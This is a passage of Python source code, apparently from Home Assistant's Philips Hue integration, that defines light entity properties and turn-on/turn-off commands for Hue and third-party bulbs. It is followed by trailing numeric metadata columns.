self.is_innr = light.manufacturername == "innr"
self.is_ewelink = light.manufacturername == "eWeLink"
self.is_livarno = light.manufacturername.startswith("_TZ3000_")
self.gamut_typ = self.light.colorgamuttype
self.gamut = self.light.colorgamut
_LOGGER.debug("Color gamut of %s: %s", self.name, str(self.gamut))
if self.light.swupdatestate == "readytoinstall":
err = (
"Please check for software updates of the %s "
"bulb in the Philips Hue App."
)
_LOGGER.warning(err, self.name)
if self.gamut and not color.check_valid_gamut(self.gamut):
err = "Color gamut of %s: %s, not valid, setting gamut to None."
_LOGGER.debug(err, self.name, str(self.gamut))
self.gamut_typ = GAMUT_TYPE_UNAVAILABLE
self.gamut = None
@property
def unique_id(self):
"""Return the unique ID of this Hue light."""
unique_id = self.light.uniqueid
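# Hue groups have no uniqueid of their own; fall back to the owning
# room's id when available.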
if not unique_id and self.is_group and self.light.room:
unique_id = self.light.room["id"]
return unique_id
@property
def device_id(self):
"""Return the ID of this Hue light."""
return self.unique_id
@property
def name(self):
"""Return the name of the Hue light."""
return self.light.name
@property
def brightness(self):
"""Return the brightness of this light between 0..255."""
if self.is_group:
bri = self.light.action.get("bri")
else:
bri = self.light.state.get("bri")
if bri is None:
return bri
return hue_brightness_to_hass(bri)
@property
def _color_mode(self):
"""Return the hue color mode."""
if self.is_group:
return self.light.action.get("colormode")
return self.light.state.get("colormode")
@property
def hs_color(self):
"""Return the hs color value."""
mode = self._color_mode
source = self.light.action if self.is_group else self.light.state
if mode in ("xy", "hs") and "xy" in source:
return color.color_xy_to_hs(*source["xy"], self.gamut)
return None
@property
def color_temp(self):
"""Return the CT color value."""
# Don't return color temperature unless in color temperature mode
if self._color_mode != "ct":
return None
if self.is_group:
return self.light.action.get("ct")
return self.light.state.get("ct")
@property
def min_mireds(self):
"""Return the coldest color_temp that this light supports."""
if self.is_group:
return super().min_mireds
min_mireds = self.light.controlcapabilities.get("ct", {}).get("min")
# We filter out '0' too, which can be incorrectly reported by 3rd party bulbs
if not min_mireds:
return super().min_mireds
return min_mireds
@property
def max_mireds(self):
"""Return the warmest color_temp that this light supports."""
if self.is_group:
return super().max_mireds
if self.is_livarno:
return 500
max_mireds = self.light.controlcapabilities.get("ct", {}).get("max")
if not max_mireds:
return super().max_mireds
return max_mireds
@property
def is_on(self):
"""Return true if device is on."""
if self.is_group:
return self.light.state["any_on"]
return self.light.state["on"]
@property
def available(self):
"""Return if light is available."""
return self.coordinator.last_update_success and (
self.is_group
or self.bridge.allow_unreachable
or self.light.state["reachable"]
)
@property
def supported_features(self):
"""Flag supported features."""
return self._supported_features
@property
def effect(self):
"""Return the current effect."""
return self.light.state.get("effect", None)
@property
def effect_list(self):
"""Return the list of supported effects."""
if self.is_osram:
return [EFFECT_RANDOM]
return [EFFECT_COLORLOOP, EFFECT_RANDOM]
@property
def device_info(self) -> DeviceInfo | None:
"""Return the device info."""
if self.light.type in (
GROUP_TYPE_LIGHT_GROUP,
GROUP_TYPE_ROOM,
GROUP_TYPE_LUMINAIRE,
GROUP_TYPE_LIGHT_SOURCE,
):
return None
suggested_area = None
if self.light.id in self._rooms:
suggested_area = self._rooms[self.light.id]
return DeviceInfo(
identifiers={(HUE_DOMAIN, self.device_id)},
manufacturer=self.light.manufacturername,
# productname added in Hue Bridge API 1.24
# (published 03/05/2018)
model=self.light.productname or self.light.modelid,
name=self.name,
# Not yet exposed as properties in aiohue
suggested_area=suggested_area,
sw_version=self.light.raw["swversion"],
via_device=(HUE_DOMAIN, self.bridge.api.config.bridgeid),
)
async def async_added_to_hass(self) -> None:
"""Handle entity being added to Home Assistant."""
self.async_on_remove(
self.bridge.listen_updates(
self.light.ITEM_TYPE, self.light.id, self.async_write_ha_state
)
)
await super().async_added_to_hass()
async def async_turn_on(self, **kwargs):
"""Turn the specified or all lights on."""
command = {"on": True}
if ATTR_TRANSITION in kwargs:
command["transitiontime"] = int(kwargs[ATTR_TRANSITION] * 10)
if ATTR_HS_COLOR in kwargs:
if self.is_osram:
command["hue"] = int(kwargs[ATTR_HS_COLOR][0] / 360 * 65535)
command["sat"] = int(kwargs[ATTR_HS_COLOR][1] / 100 * 255)
else:
# Philips hue bulb models respond differently to hue/sat
# requests, so we convert to XY first to ensure a consistent
# color.
xy_color = color.color_hs_to_xy(*kwargs[ATTR_HS_COLOR], self.gamut)
command["xy"] = xy_color
elif ATTR_COLOR_TEMP in kwargs:
temp = kwargs[ATTR_COLOR_TEMP]
command["ct"] = max(self.min_mireds, min(temp, self.max_mireds))
if ATTR_BRIGHTNESS in kwargs:
command["bri"] = hass_to_hue_brightness(kwargs[ATTR_BRIGHTNESS])
flash = kwargs.get(ATTR_FLASH)
if flash == FLASH_LONG:
command["alert"] = "lselect"
del command["on"]
elif flash == FLASH_SHORT:
command["alert"] = "select"
del command["on"]
elif not self.is_innr and not self.is_ewelink and not self.is_livarno:
command["alert"] = "none"
if ATTR_EFFECT in kwargs:
effect = kwargs[ATTR_EFFECT]
if effect == EFFECT_COLORLOOP:
command["effect"] = "colorloop"
elif effect == EFFECT_RANDOM:
command["hue"] = random.randrange(0, 65535)
command["sat"] = random.randrange(150, 254)
else:
command["effect"] = "none"
if self.is_group:
await self.bridge.async_request_call(
partial(self.light.set_action, **command)
)
else:
await self.bridge.async_request_call(
partial(self.light.set_state, **command)
)
await self.coordinator.async_request_refresh()
async def async_turn_off(self, **kwargs):
"""Turn the specified or all lights off."""
command = {"on": False}
if ATTR_TRANSITION in kwargs:
command["transitiontime"] = int(kwargs[ATTR_TRANSITION] * 10)
flash = kwargs.get(ATTR_FLASH)
if flash == FLASH_LONG:
command["alert"] = "lselect"
del command["on"]
elif flash == FLASH_SHORT:
command["alert"] = "select"
del command["on"]
elif not self.is_innr and not self.is_livarno:
command["alert"] = "none"
if self.is_group:
await self.bridge.async_request_call(
partial(self.light.set_action, **command)
)
else:
await self.bridge.async_request_call(
partial(self.light.set_state, **command)
)
await self.coordinator.async_request_refresh()
@property
def extra_state_attributes(self):
"""Return the device state attributes."""
if not self.is_group:
return {}
return {ATTR_IS_HUE_GROUP: self.is_group}
| 32.702128
| 88
| 0.635437
| 2,229
| 18,444
| 5.014805
| 0.155227
| 0.02818
| 0.013777
| 0.020129
| 0.29576
| 0.233405
| 0.219002
| 0.183575
| 0.176955
| 0.148685
| 0
| 0.007822
| 0.279169
| 18,444
| 563
| 89
| 32.760213
| 0.832945
| 0.10052
| 0
| 0.313253
| 0
| 0
| 0.038181
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055422
| false
| 0
| 0.038554
| 0
| 0.183133
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|